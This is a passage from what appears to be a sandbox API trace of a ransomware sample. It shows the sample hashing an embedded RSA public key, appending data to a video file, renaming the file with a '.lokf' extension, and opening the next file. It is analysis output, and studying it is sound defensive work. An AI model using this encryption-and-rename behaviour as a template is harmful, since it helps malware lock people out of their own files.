KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.034] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0061.035] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.035] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.035] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.035] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0061.035] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.035] GetLastError () returned 0x0 [0061.035] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.035] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0061.035] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.035] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.035] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.035] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.036] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0061.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861d8 | out: hHeap=0x660000) returned 1 [0061.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861f0 | out: hHeap=0x660000) returned 1 [0061.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0061.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0061.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0061.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c861f0 [0061.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0061.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c861d8 [0061.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0061.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0061.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0061.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0061.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0061.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0061.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0061.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861f0 | out: hHeap=0x660000) returned 1 [0061.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0061.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861d8 | out: hHeap=0x660000) returned 1 [0061.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0061.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0061.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.037] GetCurrentThreadId () returned 0x9e0 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8c250 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b87a8 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.037] GetCurrentThreadId () returned 0x9e0 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0061.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0061.037] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0061.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c861d8 [0061.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0061.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c861f0 [0061.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0061.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c861c0 [0061.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0061.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0061.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0061.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0061.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86208 [0061.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0061.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0061.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0061.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0061.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861d8 | out: hHeap=0x660000) returned 1 [0061.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c861d8 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0061.039] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.039] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.039] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x9c87710 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.039] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0061.039] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861d8 | out: hHeap=0x660000) returned 1 [0061.039] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32947b0 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0061.039] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b87a8 | out: hHeap=0x660000) returned 1 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87710 | out: hHeap=0x660000) returned 1 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86208 | out: hHeap=0x660000) returned 1 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861f0 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861c0 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861a8 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86b60 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0061.040] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8dae8*, nNumberOfBytesToWrite=0x4cff, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8dae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x4cff, lpOverlapped=0x0) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8dae8 | out: hHeap=0x660000) returned 1 [0061.040] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4d04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.040] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0061.041] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.041] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0061.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0061.041] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0061.041] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.041] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0061.041] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0061.041] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0061.041] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.041] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.041] CloseHandle (hObject=0x5cc) returned 1 [0061.042] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262c78 [0061.042] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0061.042] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262c78 | out: hHeap=0x660000) returned 1 [0061.042] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\olMX62ll.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\olmx62ll.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\olMX62ll.avi.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\olmx62ll.avi.lokf")) returned 1 [0061.042] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.042] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.042] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.043] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31c46f0 | out: hHeap=0x660000) returned 1 [0061.043] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fb24520, ftCreationTime.dwHighDateTime=0x1d4ce6c, ftLastAccessTime.dwLowDateTime=0x5c8de920, ftLastAccessTime.dwHighDateTime=0x1d4d3c1, ftLastWriteTime.dwLowDateTime=0x5c8de920, ftLastWriteTime.dwHighDateTime=0x1d4d3c1, nFileSizeHigh=0x0, nFileSizeLow=0xa4f6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qj8V72.mp4", cAlternateFileName="")) returned 1 [0061.043] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0061.043] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x31c46f0 [0061.043] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0061.043] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\qj8V72.mp4") returned=".mp4" [0061.043] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\qj8V72.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\qj8v72.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.044] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=42230) returned 1 [0061.044] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.046] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa4d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.046] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.047] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.047] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.047] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0061.047] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xa4f6, lpOverlapped=0x0) returned 1 [0061.047] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.047] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0061.047] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.047] lstrlenA (lpString="-----BEGIN PUBLIC 